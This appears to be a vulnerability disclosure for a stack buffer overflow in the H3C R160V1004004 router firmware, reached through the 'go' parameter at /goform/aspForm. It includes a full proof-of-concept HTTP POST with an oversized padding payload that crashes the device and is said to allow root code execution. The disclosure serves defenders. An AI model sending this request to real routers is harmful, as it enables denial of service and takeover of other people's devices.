H3C R160V1004004 was discovered to contain a stack overflow via go parameter at /goForm/aspForm
1.Manufacturer Information
- Product:H3C R160V smart wifi Router
- Manufactor:H3C
- product information:https://www.h3c.com/cn/Service/Document_Software/Software_Download/Consume_product/Catalog/H3C_Magic_R/R160/
- firmware download:https://www.h3c.com/cn/d_202012/1361139_30005_0.htm
2.Vulnerability details
The program obtains content via the go parameter, which is then passed to v3 and copied into goHtmlUrl without checking the size of v3. As a result, a buffer overflow vulnerability exists.
3.POC
POST /goform/aspForm HTTP/1.1
Host: 192.168.1.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Apifox/1.0.0 (https://www.apifox.cn)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/mobile.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG=
Connection: close
Content-Length: 516
go=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;
By sending this data packet, it is possible to trigger a device stack overflow error, causing the device to deny service, while also enabling code to be written to obtain root privileges.
4.Author
Xiquan Deng

